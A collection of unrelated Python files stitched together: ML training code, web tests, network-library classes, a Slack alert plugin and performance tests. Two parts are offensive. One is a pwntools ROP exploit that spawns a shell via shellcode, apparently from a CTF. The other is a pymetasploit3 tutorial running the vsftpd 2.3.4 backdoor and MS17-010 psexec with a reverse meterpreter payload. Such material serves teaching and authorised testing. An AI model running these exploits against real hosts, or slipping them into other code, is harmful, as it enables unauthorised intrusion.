# Helper function to compute confidence thresholding factor
def conf_factor(teacher_pred_prob):
# Compute confidence
conf_tea = torch.max(teacher_pred_prob, 1)[0]
conf_tea = conf_tea.detach()
# Compute factor based on threshold and `conf_avg` flag
if conf_thresh > 0.0:
conf_fac = (conf_tea >= conf_thresh).float()
else:
conf_fac = torch.ones(conf_tea.shape, dtype=torch.float, device=conf_tea.device)
if conf_avg:
conf_fac = torch.ones_like(conf_fac) * conf_fac.mean()
return conf_fac
# Helper function that constrains consistency loss to operate only when perturbations lie along
# distance map contours.
# When this feature is enabled, it masks to zero the loss for any unsupervised sample whose random perturbation
# deviates too far from the distance map contour
def dist_map_weighting(t_dist_map, batch_u_X, batch_u_X_1):
if t_dist_map is not None and dist_contour_range > 0:
# For each sample in `batch_u_X` and `batch_u_X_1`, both of which are
# of shape `[n_points, [y,x]]` we want to get the value from the
# distance map. For this we use `torch.nn.functional.grid_sample`.
# This function expects grid look-up co-ordinates to have
# the shape `[batch, height, width, [x, y]]`.
# We reshape `batch_u_X` and `batch_u_X_1` to `[1, 1, n_points, [x,y]]` and stack along
# the height dimension, making two rows to send to `grid_sample`.
# The final shape will be `[1, 2, n_points, [x,y]]`:
# 1 sample (1 image)
# 2 rows; batch_u_X and batch_u_X_1
# n_points columns
# (x,y)
# `[n_points, [y,x]]` -> `[1, 1, n_points, [x,y]]`
sample_points_0 = torch.cat([batch_u_X[:, 1].view(1, 1, -1, 1),
batch_u_X[:, 0].view(1, 1, -1, 1)], dim=3)
# `[n_points, [y,x]]` -> `[1, 1, n_points, [x,y]]`
sample_points_1 = torch.cat([batch_u_X_1[:, 1].view(1, 1, -1, 1),
batch_u_X_1[:, 0].view(1, 1, -1, 1)], dim=3)
# -> `[1, 2, n_points, [x,y]]`
sample_points = torch.cat([sample_points_0, sample_points_1], dim=1)
# Get distance to class boundary from distance map
dist_from_boundary = F.grid_sample(t_dist_map, sample_points)
# Get the squared difference between the distances from `batch_u_X` to the boundary
# and the distances from `batch_u_X_1` to the boundary.
delta_dist_sqr = (dist_from_boundary[0, 0, 0, :] - dist_from_boundary[0, 0, 1, :]).pow(2)
# Per-sample loss mask based on difference between distances
weight = (delta_dist_sqr <= (dist_contour_range*dist_contour_range)).float()
return weight
else:
return torch.ones(len(batch_u_X), dtype=torch.float, device=batch_u_X.device)
# Supervised dataset, sampler and loader
sup_dataset = torch.utils.data.TensorDataset(torch.tensor(ds.sup_X, dtype=torch.float),
torch.tensor(ds.sup_y, dtype=torch.long))
sup_sampler = RepeatSampler(torch.utils.data.RandomSampler(sup_dataset))
sup_sep_loader = torch.utils.data.DataLoader(sup_dataset, batch_size, sampler=sup_sampler, num_workers=1)
# Unsupervised dataset, sampler and loader
unsup_dataset = torch.utils.data.TensorDataset(torch.tensor(ds.unsup_X, dtype=torch.float))
unsup_sampler = torch.utils.data.RandomSampler(unsup_dataset)
unsup_loader = torch.utils.data.DataLoader(unsup_dataset, batch_size, sampler=unsup_sampler, num_workers=1)
# Complete dataset and loader
all_dataset = torch.utils.data.TensorDataset(torch.tensor(ds.X, dtype=torch.float))
all_loader = torch.utils.data.DataLoader(all_dataset, 16384, shuffle=False, num_workers=1)
# Grid points used to render visualizations
vis_grid_dataset = torch.utils.data.TensorDataset(torch.tensor(ds.px_grid_vis, dtype=torch.float))
vis_grid_loader = torch.utils.data.DataLoader(vis_grid_dataset, 16384, shuffle=False, num_workers=1)
# Evaluation mode initially
student_net.eval()
if teacher_net is not None:
teacher_net.eval()
# Compute the magnitude of the gradient of the consistency loss at the logits
def consistency_loss_logit_grad_mag(batch_u_X):
u_shape = batch_u_X.shape
batch_u_X_1 = batch_u_X + torch.randn(u_shape, dtype=torch.float, device=torch_device) * \
perturb_noise_std_real_scale[None, :]
student_optimizer.zero_grad()
grads = [None]
if teacher_net is not None:
teacher_unsup_logits = teacher_net(batch_u_X).detach()
else:
teacher_unsup_logits = student_net(batch_u_X)
teacher_unsup_prob = F.softmax(teacher_unsup_logits, dim=1)
student_unsup_logits = student_net(batch_u_X_1)
def grad_hook(grad):
grads[0] = torch.sqrt((grad*grad).sum(dim=1))
student_unsup_logits.register_hook(grad_hook)
student_unsup_prob = F.softmax(student_unsup_logits, dim=1)
weight = dist_map_weighting(t_dist_map, batch_u_X, batch_u_X_1)
mod_fac = conf_factor(teacher_unsup_prob) * weight
if cons_loss_fn == 'bce':
aug_loss = robust_binary_crossentropy(student_unsup_prob, teacher_unsup_prob)
aug_loss = aug_loss.mean(dim=1) * mod_fac
unsup_loss = aug_loss.mean()
elif cons_loss_fn == 'var':
d_aug_loss = student_unsup_prob - teacher_unsup_prob
aug_loss = d_aug_loss * d_aug_loss
aug_loss = aug_loss.mean(dim=1) * mod_fac
unsup_loss = aug_loss.mean()
elif cons_loss_fn == 'logits_var':
d_aug_loss = student_unsup_logits - teacher_unsup_logits
aug_loss = d_aug_loss * d_aug_loss
aug_loss = aug_loss.mean(dim=1) * mod_fac
unsup_loss = aug_loss.mean()
else:
raise ValueError
unsup_loss.backward()
return (grads[0].cpu().numpy(),)
# Helper function for rendering an output image for visualization
def render_output_image():
# Generate output for plotting
with torch.no_grad():
vis_pred = []
vis_grad = [] if render_cons_grad else None
for (batch_X,) in vis_grid_loader:
batch_X = batch_X.to(torch_device)
batch_pred_logits = pred_net(batch_X)
if render_pred == 'prob':
batch_vis = F.softmax(batch_pred_logits, dim=1)[:, 1]
elif render_pred == 'class':
batch_vis = torch.argmax(batch_pred_logits, dim=1)
else:
raise ValueError('Unknown prediction render {}'.format(render_pred))
batch_vis = batch_vis.detach().cpu().numpy()
vis_pred.append(batch_vis)
if render_cons_grad:
batch_grad = consistency_loss_logit_grad_mag(batch_X)
vis_grad.append(batch_grad.detach().cpu().numpy())
vis_pred = np.concatenate(vis_pred, axis=0)
if render_cons_grad:
vis_grad = np.concatenate(vis_grad, axis=0)
out_image = ds.semisup_image_plot(vis_pred, vis_grad)
return out_image
# Output image for first frame
if save_output and submit_config.run_dir is not None:
plot_path = os.path.join(submit_config.run_dir, 'epoch_{:05d}.png'.format(0))
cv2.imwrite(plot_path, render_output_image())
else:
cv2.imshow('Vis', render_output_image())
k = cv2.waitKey(1)
# Train
print('|sup|={}'.format(len(ds.sup_X)))
print('|unsup|={}'.format(len(ds.unsup_X)))
print('|all|={}'.format(len(ds.X)))
print('Training...')
terminated = False
for epoch in range(num_epochs):
t1 = time.time()
student_net.train()
if teacher_net is not None:
teacher_net.train()
batch_sup_loss_accum = 0.0
batch_conf_mask_sum_accum = 0.0
batch_cons_loss_accum = 0.0
batch_N_accum = 0.0
for sup_batch, unsup_batch in zip(sup_sep_loader, unsup_loader):
(batch_X, batch_y) = sup_batch
(batch_u_X,) = unsup_batch
batch_X = batch_X.to(torch_device)
batch_y = batch_y.to(torch_device)
batch_u_X = batch_u_X.to(torch_device)
# Apply perturbation to generate `batch_u_X_1`
aug_perturbation = torch.randn(batch_u_X.shape, dtype=torch.float, device=torch_device)
batch_u_X_1 = batch_u_X + aug_perturbation * perturb_noise_std_real_scale[None, :]
# Supervised loss path
student_optimizer.zero_grad()
student_sup_logits = student_net(batch_X)
sup_loss = classification_criterion(student_sup_logits, batch_y)
if cons_weight > 0.0:
# Consistency loss path
# Logits are computed differently depending on model
if model == 'mean_teacher':
teacher_unsup_logits = teacher_net(batch_u_X, use_dropout=not cons_no_dropout).detach()
student_unsup_logits = student_net(batch_u_X_1, use_dropout=not cons_no_dropout)
elif model == 'pi':
teacher_unsup_logits = student_net(batch_u_X, use_dropout=not cons_no_dropout)
student_unsup_logits = student_net(batch_u_X_1, use_dropout=not cons_no_dropout)
elif model == 'pi_onebatch':
batch_both = torch.cat([batch_u_X, batch_u_X_1], dim=0)
both_unsup_logits = student_net(batch_both, use_dropout=not cons_no_dropout)
teacher_unsup_logits = both_unsup_logits[:len(batch_u_X)]
student_unsup_logits = both_unsup_logits[len(batch_u_X):]
else:
raise RuntimeError
# Compute predicted probabilities
teacher_unsup_prob = F.softmax(teacher_unsup_logits, dim=1)
student_unsup_prob = F.softmax(student_unsup_logits, dim=1)
# Distance map weighting
# (if dist_contour_range is 0 then weight will just be 1)
weight = dist_map_weighting(t_dist_map, batch_u_X, batch_u_X_1)
# Confidence thresholding
conf_fac = conf_factor(teacher_unsup_prob)
mod_fac = conf_fac * weight
# Compute consistency loss
if cons_loss_fn == 'bce':
aug_loss = robust_binary_crossentropy(student_unsup_prob, teacher_unsup_prob)
aug_loss = aug_loss.mean(dim=1) * mod_fac
cons_loss = aug_loss.sum() / weight.sum()
elif cons_loss_fn == 'var':
d_aug_loss = student_unsup_prob - teacher_unsup_prob
aug_loss = d_aug_loss * d_aug_loss
aug_loss = aug_loss.mean(dim=1) * mod_fac
cons_loss = aug_loss.sum() / weight.sum()
elif cons_loss_fn == 'logits_var':
d_aug_loss = student_unsup_logits - teacher_unsup_logits
aug_loss = d_aug_loss * d_aug_loss
aug_loss = aug_loss.mean(dim=1) * mod_fac
cons_loss = aug_loss.sum() / weight.sum()
else:
raise ValueError
# Combine supervised and consistency loss
loss = sup_loss + cons_loss * cons_weight
conf_rate = float(conf_fac.sum())
else:
loss = sup_loss
conf_rate = 0.0
cons_loss = 0.0
loss.backward()
student_optimizer.step()
if teacher_optimizer is not None:
teacher_optimizer.step()
batch_sup_loss_accum += float(sup_loss)
batch_conf_mask_sum_accum += conf_rate
batch_cons_loss_accum += float(cons_loss)
batch_N_accum += len(batch_X)
if batch_N_accum > 0:
batch_sup_loss_accum /= batch_N_accum
batch_conf_mask_sum_accum /= batch_N_accum
batch_cons_loss_accum /= batch_N_accum
student_net.eval()
if teacher_net is not None:
teacher_net.eval()
# Generate output for plotting
if save_output and submit_config.run_dir is not None:
plot_path = os.path.join(submit_config.run_dir, 'epoch_{:05d}.png'.format(epoch + 1))
cv2.imwrite(plot_path, render_output_image())
else:
cv2.imshow('Vis', render_output_image())
k = cv2.waitKey(1)
if (k & 255) == 27:
terminated = True
break
t2 = time.time()
# print('Epoch {}: took {:.3f}s: clf loss={:.6f}'.format(epoch, t2-t1, clf_loss))
print('Epoch {}: took {:.3f}s: clf loss={:.6f}, conf rate={:.3%}, cons loss={:.6f}'.format(
epoch+1, t2-t1, batch_sup_loss_accum, batch_conf_mask_sum_accum, batch_cons_loss_accum))
# Get final score based on all samples
all_pred_y = []
with torch.no_grad():
for (batch_X,) in all_loader:
batch_X = batch_X.to(torch_device)
batch_pred_logits = pred_net(batch_X)
batch_pred_cls = torch.argmax(batch_pred_logits, dim=1)
all_pred_y.append(batch_pred_cls.detach().cpu().numpy())
all_pred_y = np.concatenate(all_pred_y, axis=0)
err_rate = (all_pred_y != ds.y).mean()
print('FINAL RESULT: Error rate={:.6%} (supervised and unsupervised samples)'.format(err_rate))
if not save_output:
# Close output window
if not terminated:
cv2.waitKey()
cv2.destroyAllWindows()
@click.command()
@click.option('--job_desc', type=str, default='')
@click.option('--dataset', type=str, default='spiral')
@click.option('--region_erode_radius', type=int, default=35)
@click.option('--img_noise_std', type=float, default=2.0)
@click.option('--n_sup', type=int, default=10)
@click.option('--balance_classes', is_flag=True, default=False)
@click.option('--seed', type=int, default=12345)
@click.option('--sup_path', type=click.Path(dir_okay=False, file_okay=True, exists=True))
@click.option('--model', type=click.Choice(['mean_teacher', 'pi', 'pi_onebatch']), default='mean_teacher')
@click.option('--n_hidden', type=int, default=3)
@click.option('--hidden_size', type=int, default=512)
@click.option('--hidden_act', type=click.Choice(['relu', 'lrelu']), default='relu')
@click.option('--norm_layer', type=click.Choice(['none', 'batch_norm', 'weight_norm',
'spectral_norm', 'group_norm']), default='batch_norm')
@click.option('--perturb_noise_std', type=str, default='6.0')
@click.option('--dist_contour_range', type=float, default=0.0)
@click.option('--conf_thresh', type=float, default=0.97)
@click.option('--conf_avg', is_flag=True, default=False)
@click.option('--cons_weight', type=float, default=10.0)
@click.option('--cons_loss_fn', type=click.Choice(['var', 'bce', 'logits_var']), default='var')
@click.option('--cons_no_dropout', is_flag=True, default=False)
@click.option('--learning_rate', type=float, default=2e-4)
@click.option('--teacher_alpha', type=float, default=0.99)
@click.option('--num_epochs', type=int, default=100)
@click.option('--batch_size', type=int, default=512)
@click.option('--render_cons_grad', is_flag=True, default=False)
@click.option('--render_pred', type=click.Choice(['class', 'prob']), default='prob')
@click.option('--device', type=str, default='cuda:0')
@click.option('--save_output', is_flag=True, default=False)
def experiment(job_desc, dataset, region_erode_radius, img_noise_std, n_sup, balance_classes, seed,
sup_path, model, n_hidden, hidden_size, hidden_act, norm_layer,
perturb_noise_std, dist_contour_range,
conf_thresh, conf_avg,
cons_weight, cons_loss_fn, cons_no_dropout,
learning_rate, teacher_alpha,
num_epochs, batch_size, render_cons_grad, render_pred, device, save_output):
params = locals().copy()
train_toy2d.submit(**params)
if __name__ == '__main__':
experiment()
|
11482606
|
import json
def test_attempt_parse_request_missing_content_type_raises_bad_request_error(
client, snapshot
):
response = client.post("/", data="")
assert response.status_code == 400
snapshot.assert_match(response.text)
def test_attempt_parse_non_json_request_raises_bad_request_error(client, snapshot):
response = client.post("/", data="", headers={"content-type": "text/plain"})
assert response.status_code == 400
snapshot.assert_match(response.text)
def test_attempt_parse_non_json_request_body_raises_bad_request_error(client, snapshot):
response = client.post("/", data="", headers={"content-type": "application/json"})
assert response.status_code == 400
snapshot.assert_match(response.text)
def test_attempt_parse_json_scalar_request_raises_graphql_bad_request_error(
client, snapshot
):
response = client.post("/", json="json string")
assert response.status_code == 400
snapshot.assert_match(response.text)
def test_attempt_parse_json_array_request_raises_graphql_bad_request_error(
client, snapshot
):
response = client.post("/", json=[1, 2, 3])
assert response.status_code == 400
snapshot.assert_match(response.text)
def test_multipart_form_request_fails_if_operations_is_not_valid_json(client, snapshot):
response = client.post(
"/",
data={
"operations": "not a valid json",
"map": json.dumps({"0": ["variables.file"]}),
},
files={"0": ("test.txt", "hello")},
)
assert response.status_code == 400
snapshot.assert_match(response.content)
def test_multipart_form_request_fails_if_map_is_not_valid_json(client, snapshot):
response = client.post(
"/",
data={
"operations": json.dumps(
{
"query": "mutation($file: Upload!) { upload(file: $file) }",
"variables": {"file": None},
}
),
"map": "not a valid json",
},
files={"0": ("test.txt", "hello")},
)
assert response.status_code == 400
snapshot.assert_match(response.content)
|
11482611
|
from ixnetwork_restpy.base import Base
from ixnetwork_restpy.files import Files
class AtmCell(Base):
__slots__ = ()
_SDM_NAME = 'atmCell'
_SDM_ATT_MAP = {
'AtmCellVpi': 'atmCell.atmCell.vpi-1',
'AtmCellVci': 'atmCell.atmCell.vci-2',
'AtmCellPti': 'atmCell.atmCell.pti-3',
'AtmCellCellRelayCbit': 'atmCell.atmCell.cellRelayCbit-4',
'AtmCellCellData': 'atmCell.atmCell.cellData-5',
}
def __init__(self, parent, list_op=False):
super(AtmCell, self).__init__(parent, list_op)
@property
def AtmCellVpi(self):
"""
Display Name: VPI
Default Value: 0
Value Format: decimal
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['AtmCellVpi']))
@property
def AtmCellVci(self):
"""
Display Name: VCI
Default Value: 32
Value Format: decimal
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['AtmCellVci']))
@property
def AtmCellPti(self):
"""
Display Name: PTI
Default Value: 1
Value Format: decimal
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['AtmCellPti']))
@property
def AtmCellCellRelayCbit(self):
"""
Display Name: Cell Relay Cbit
Default Value: 0
Value Format: decimal
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['AtmCellCellRelayCbit']))
@property
def AtmCellCellData(self):
"""
Display Name: Cell Data
Default Value: 0xAAAA030000000800450000200000000040FF5BDC0A00000214000002DDDDDDDDDDDDDDDDDDDDDDDD00000028BF1E07A2
Value Format: hex
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['AtmCellCellData']))
def add(self):
return self._create(self._map_locals(self._SDM_ATT_MAP, locals()))
|
11482619
|
import json
import os
import requests
from cabot.cabotapp.alert import AlertPlugin
from django.conf import settings
from django.template import Template, Context
TEXT_TEMPLATE = "<{{ scheme }}://{{ host }}{% url 'service' pk=service.id %}|{{ service.name }}> {{ message }}"
URL_TEMPLATE = "{{ scheme }}://{{ host }}{% url 'result' pk=check.last_result.id %}"
MESSAGES_BY_STATUS = {
"PASSING": "has returned to normal! :up:",
"WARNING": "is reporting WARNING. :warning:",
"ERROR": "is reporting ERROR. :negative_squared_cross_mark:",
"CRITICAL": "is reporting CRITICAL errors! :skull::sos:",
}
class SlackAlert(AlertPlugin):
name = "Slack"
author = "<NAME>"
def send_alert(self, service, users, duty_officers):
self._send_alert(service, acked=False)
def send_alert_update(self, service, users, duty_officers):
self._send_alert(service, acked=True)
def _send_alert(self, service, acked):
overall_status = service.overall_status
if not (acked and overall_status != "PASSING"):
message = MESSAGES_BY_STATUS[overall_status]
else:
user = service.unexpired_acknowledgement().user
name = user.first_name or user.username
message = "is being worked on by {}. :hammer:".format(name)
context = Context({
"scheme": settings.WWW_SCHEME,
"host": settings.WWW_HTTP_HOST,
"service": service,
"message": message,
})
text = Template(TEXT_TEMPLATE).render(context)
attachments = []
for check in service.all_failing_checks():
if check.importance == "WARNING":
color = "warning"
else:
color = "danger"
check_context = Context({
"scheme": settings.WWW_SCHEME,
"host": settings.WWW_HTTP_HOST,
"check": check,
})
url = Template(URL_TEMPLATE).render(check_context)
attachment = {
"fallback": "{}: {}: {}".format(check.name, check.importance, url),
"title": check.name,
"title_link": url,
"text": check.last_result().error,
"color": color,
}
attachments.append(attachment)
self._send_slack_webhook(text, attachments)
def _send_slack_webhook(self, text, attachments):
url = os.environ["SLACK_WEBHOOK_URL"]
channel = os.environ["SLACK_ALERT_CHANNEL"]
response = requests.post(url, data=json.dumps({
"username": "Cabot",
"icon_emoji": ":dog2:",
"channel": channel,
"text": text,
"attachments": attachments,
}))
response.raise_for_status()
|
11482644
|
import os
from .core import Base
DEFAULT_SETTINGS = {
"HALT_ON_ERROR": True,
"LOG_FORMAT": '%(log_color)s[%(name)s]: %(message)s',
"LOG_COLORS": {
'DEBUG': 'cyan',
'INFO': 'green',
'WARNING': 'yellow',
'ERROR': 'red',
'CRITICAL': 'bold_red',
}
}
SULTAN_SETTINGS_MODULE_ENV = 'SULTAN_SETTINGS_MODULE'
class Settings(Base):
def __init__(self):
super(Settings, self).__init__()
self._settings = DEFAULT_SETTINGS.copy()
self._load_setting_module()
def _load_setting_module(self):
if SULTAN_SETTINGS_MODULE_ENV in os.environ:
settings = __import__(os.environ[SULTAN_SETTINGS_MODULE_ENV])
for k, v in settings.items():
self._settings[k] = v
def __getattr__(self, attr):
try:
return self._settings[attr]
except KeyError:
raise ValueError("Invalid Setting '%s'." % (attr))
settings = Settings()
|
11482680
|
import socket
sock = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
sock.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, 1)
sock.bind(('::', 8080))
sock.listen()
print(sock.accept())
|
11482717
|
from .base_shard_strategy import BaseShardStrategy
from .bucket_tensor_shard_strategy import BucketTensorShardStrategy
from .tensor_shard_strategy import TensorShardStrategy
__all__ = ['BaseShardStrategy', 'TensorShardStrategy', 'BucketTensorShardStrategy']
|
11482721
|
from __future__ import print_function
# Standard library imports
import unittest
import timeit
# Enthought library imports
from traits.testing.api import performance
from codetools.contexts.tests.abstract_context_test_case import AbstractContextTestCase
from codetools.contexts.data_context import DataContext
from codetools.contexts.multi_context import MultiContext
from codetools.contexts.api import AdaptedDataContext
##########################################################################
#
# These tests used to be in:
#
# enthought/contexts/tests/
#
# data_context_test_case.py
# multi_context_test_case.py
# context_with_unit_conversion_adapter_test_case.py
class DataContextTestCase(AbstractContextTestCase):
#### AbstactContextTestCase interface ######################################
def context_factory(self, *args, **kw):
""" Return the type of context we are testing.
"""
return DataContext(*args, **kw)
def matched_input_output_pair(self):
""" Return values for testing dictionary get/set, etc.
"""
return 1.2, 1.2
@performance
def test_eval_is_not_slow(self):
""" eval() with DataContext is the speed of a dict. (slowdown < 2.0)
This is test using a vp array with 20 values in it to try and get
a reasonable use case.
"""
### Parameters ########################################################
# Slowdown we will allow compared to standard python evaluation
allowed_slowdown = 2.0
# Number of timer iterations.
N = 10000
### Standard execution ################################################
setup = "from numpy import arange\n" \
"vp=arange(20.)\n"
expr = 'vp+vp+vp+vp+vp+vp'
std = timeit.Timer(expr, setup)
std_res = std.timeit(N)
### Eval execution ####################################################
# Note: This is not used, but it is here for reference
#
# eval is actually slower (by an order or so of magnitude for single
# numbers) than a simple expression. But for our array, it should be
# about the same speed.
compiled_setup = "compiled_expr = compile('%s','expr','eval')\n" % expr
eval_setup = setup + compiled_setup
eval_expr = "eval(compiled_expr)"
eval_timer = timeit.Timer(eval_expr, eval_setup)
eval_res = eval_timer.timeit(N)
### DataContext execution #############################################
this_setup = "from codetools.contexts.data_context import DataContext\n" \
"context=DataContext()\n" \
"context['vp'] = vp\n"
context_setup = setup + this_setup + compiled_setup
context_expr = "eval(compiled_expr, globals(), context)"
context_timer = timeit.Timer(context_expr, context_setup)
context_res = context_timer.timeit(N)
slowdown = context_res/std_res
msg = 'actual slowdown: %f\nallowed slowdown: %f' % (slowdown, allowed_slowdown)
assert slowdown < allowed_slowdown, msg
class MultiContextTestCase(AbstractContextTestCase):
############################################################################
# AbstractContextTestCase interface
############################################################################
def context_factory(self, *args, **kw):
""" Return the type of context we are testing.
"""
return MultiContext(DataContext(*args, **kw))
def matched_input_output_pair(self):
""" Return values for testing dictionary get/set, etc.
"""
return 1.2, 1.2
############################################################################
# MultiContext2TestCase interface
############################################################################
@performance
def test_eval_is_not_slow(self):
""" eval() with DataContext is the speed of a dict. (slowdown < 1.3)
This is test using a vp array with 20 values in it to try and get
a reasonable use case.
"""
### Parameters #########################################################
# Slowdown we will allow compared to standard python evaluation
allowed_slowdown = 1.5
# Number of timer iterations.
N = 10000
### Standard execution #################################################
setup = "from numpy import arange\n" \
"vp=arange(20.)\n"
expr = 'vp+vp+vp+vp+vp+vp'
std = timeit.Timer(expr, setup)
std_res = std.timeit(N)
### Eval execution #####################################################
# Note: This is not used, but it is here for reference
#
# eval is actually slower (by an order or so of magnitude for single
# numbers) than a simple expression. But for our array, it should be
# about the same speed.
compiled_setup = "compiled_expr = compile(%r,'expr','eval')\n" % expr
eval_setup = setup + compiled_setup
eval_expr = "eval(compiled_expr)"
eval_timer = timeit.Timer(eval_expr, eval_setup)
eval_res = eval_timer.timeit(N)
### DataContext execution ##############################################
this_setup = "from codetools.contexts.api import MultiContext\n" \
"context=MultiContext()\n" \
"context['vp'] = vp\n"
context_setup = setup + this_setup + compiled_setup
context_expr = "eval(compiled_expr, globals(), context)"
context_timer = timeit.Timer(context_expr, context_setup)
context_res = eval_timer.timeit(N)
slowdown = context_res/std_res
msg = 'actual slowdown: %f' % slowdown
assert slowdown < allowed_slowdown, msg
class UnitConversionContextAdapterTestCase(unittest.TestCase):
""" Other tests for UnitConversionContextAdapater
"""
############################################################################
# TestCase interface
############################################################################
def setUp(self):
self.context = AdaptedDataContext(context=DataContext())
@performance
def test_exec_is_not_slow(self):
""" Compare exec with Adapter to the speed of a dict. (slowdown < 2.5)
This test compares the costs of unit converting 1000 data points
using pure python and then using our adapater code. A factor of
2.5 is pretty lousy I'd say, so we don't want to do this much.
At the edge of function boundaries is OK.
"""
### Parameters ########################################################
# Slowdown we will allow compared to standard python evaluation
allowed_slowdown = 2.5
# Number of timer iterations.
N = 1000
### Standard execution ################################################
setup = "from numpy import arange\n" \
"from scimath.units.length import meters, feet\n" \
"from scimath import units\n" \
"depth_meters = arange(1000)\n"
code = "depth_feet = units.convert(depth_meters, meters, feet)\n" \
"depth2_feet = depth_feet + depth_feet\n" \
"depth2_meters = units.convert(depth2_feet, feet, meters)\n"
std = timeit.Timer(code, setup)
std_res = std.timeit(N)
### Adapter execution #################################################
# Adapter is set up to convert depth meters->feet and
# depth2 feet->meters
setup = "from numpy import arange\n" \
"from scimath.units.length import meters, feet\n" \
"from codetools.contexts.api import DataContext, AdaptedDataContext\n" \
"from scimath.units.api import UnitArray\n" \
"from codetools.contexts.api import UnitConversionAdapter\n" \
"data_context = DataContext()\n" \
"context = AdaptedDataContext(context=data_context)\n" \
"adapter = UnitConversionAdapter(getitem_units={'depth':feet, 'depth2':meters})\n" \
"context.push_adapter(adapter)\n" \
"context['depth'] = UnitArray(arange(1000),units=meters)\n" \
"compiled = compile('depth2 = depth + depth','foo','exec')\n"
code = "exec(compiled, globals(), context)\n"
adp = timeit.Timer(code, setup)
adp_res = adp.timeit(N)
slowdown = adp_res/std_res
msg = 'actual slowdown, time: %f' % slowdown, adp_res/N
print("[actual slowdown=%3.2f] " % slowdown)
assert slowdown < allowed_slowdown, msg
if __name__ == '__main__':
unittest.main()
|
11482774
|
from pwn import *
r=process('./bin13')
context_level="debug"
elf=ELF('bin13')
readAddr=0x806e490
hackBss=0x80ec3a0
padding=0x4c*'a'#fucking IDApro!
rop=''
rop+=padding
rop+=p32(readAddr)
rop+=p32(hackBss)
rop+=p32(0)
rop+=p32(hackBss)
rop+=p32(45)
r.sendlineafter('put?\n','-1')
r.sendlineafter('data\n',rop)
r.sendline(asm(shellcraft.sh()))
r.interactive()
|
11482794
|
from pymetasploit3.msfrpc import MsfRpcClient
## Usage example
# Connect to the RPC server
client = MsfRpcClient('<PASSWORD>')
# Get an exploit object
exploit = client.modules.use('exploit', 'unix/ftp/vsftpd_234_backdoor')
# Set the exploit options
exploit['RHOST'] = "192.168.115.80"
exploit['RPORT'] = "21"
# Execute the exploit, success will return a jobid
exploit.execute(payload="cmd/unix/interact")
# Find all available sessions
print("Sessions avaiables : ")
for s in client.sessions.list.keys():
print(s)
# Get a shell object
shell = client.sessions.session(list(client.sessions.list.keys())[0])
# Write to the shell
shell.write('whoami')
# Print the output
print(shell.read())
# Stop the shell
shell.stop()
## Console
# Create a console and get the new console ID
client.consoles.console().cid
# >>> "1"
# Destroy a console
client.console.console('1').destroy
# Write to console
client.consoles.console('1').write('show options')
# Read from console
client.consoles.console('1').read()
# >>> {'data': 'Global Options:\n===============\n\n Option...'
# 'prompt': '\x01\x02msf5\x01\x02 \x01\x02> ',
# 'busy': False}
# Check if console is busy
client.consoles.console('1').is_busy()
# >>> False
## Modules
# List exploit modules
client.modules.exploits
# >>> ['aix/local/ibstat_path',
# 'aix/rpc_cmsd_opcode21',
# 'aix/rpc_ttdbserverd_realpath',
# ...]
# Use a module
exploit = client.modules.use('exploit', 'unix/ftp/vsftpd_234_backdoor')
# Set module options
exploit['RHOST'] = "192.168.115.80"
exploit['RPORT'] = "21"
# Get required options
exploit.required
# >>> ['RHOSTS', 'RPORT', 'SSLVersion', 'ConnectTimeout']
# Get required options that haven't been set yet
exploit.missing_required
# >>> ['RHOSTS']
# See all the options which have been set
exploit.runoptions
# >>> {'VERBOSE': False,
# 'WfsDelay': 0,
# 'EnableContextEncoding': False,
# 'DisablePayloadHandler': False,
# 'RPORT': 21,
# 'SSL': False,
# 'SSLVersion': 'Auto',
# 'SSLVerifyMode': 'PEER',
# 'ConnectTimeout': 10,
# 'TCP::max_send_size': 0,
# 'TCP::send_delay': 0}
# Get the CVE/OSVDB/BID of an exploit
exploit.references
# >>> [['CVE', '2013-4011'],
# ['OSVDB', '95420'],
# ['BID', '61287'],
# ['URL', 'http://www-01.ibm.com/support/docview.wss?uid=isg1IV43827'],
# ['URL', 'http://www-01.ibm.com/support/docview.wss?uid=isg1IV43756']]
# Get an option's info
exploit.optioninfo('RHOSTS')
# >>> {'type': 'addressrange',
# 'required': True,
# 'advanced': False,
# 'evasion': False,
# 'desc': 'The target address range or CIDR identifier'}
# Get targets
exploit.targets
# >>> {0: 'Automatic'}
# Set the target
exploit.target = 0
# Get target-compatible payloads
exploit.targetpayloads()
# >>> ['cmd/unix/interact']
# Execute the module
# If 'job_id' is None, the module failed to execute
exploit.execute(payload='cmd/unix/interact')
# >>> {'job_id': 1, 'uuid': 'hb2f0yei'}
# Execute the module and return the output
cid = client.consoles.console().cid
client.consoles.console(cid).run_module_with_output(exploit, payload='cmd/unix/interact')
# >>> '... [-] 127.0.0.1:21 - Exploit failed [unreachable]: Rex::ConnectionRefused \
# The connection was refused by the remote host (127.0.0.1:21).\n[*] Exploit completed, but no session was created.\n'
## Sessions
# Get all sessions
client.sessions.list
# >>> {'1': {'type': 'meterpreter',
# 'tunnel_local': '192.168.1.2:4444',
# [...]
# 'platform': 'windows'}}
# Get a session's info
client.sessions.session('1').info
# Write to a session
client.sessions.session('1').write('help')
# Read a session
client.sessions.session('1').read()
# >>> '\nCore Commands\n=============\n\n Command Description\n ------- [...]'
# Run a command and wait for the output
client.sessions.session('1').run_with_output('arp')
# >>> '\nArp stuff'
# Run a shell command within a meterpreter session
client.sessions.session('1').run_shell_cmd_with_output('whoami')
# How to set Payload Options
# Some exploits need to set payload options, here's an example on how to do so
exploit = client.modules.use('exploit', 'windows/smb/ms17_010_psexec')
exploit['RHOSTS'] = '172.28.128.13'
# create a payload object as normal
payload = client.modules.use('payload', 'windows/meterpreter/reverse_tcp')
# add paylod specific options
payload['LHOST'] = '172.28.128.1'
payload['LPORT'] = 4444
# Execute the exploit with the linked payload, success will return a jobid
exploit.execute(payload=payload)
|
11482837
|
import six
from datasets.django.evaluator import DjangoEvaluator
if six.PY3:
from datasets.conala.evaluator import ConalaEvaluator
from datasets.wikisql.evaluator import WikiSQLEvaluator
|
11482859
|
import os
import unittest
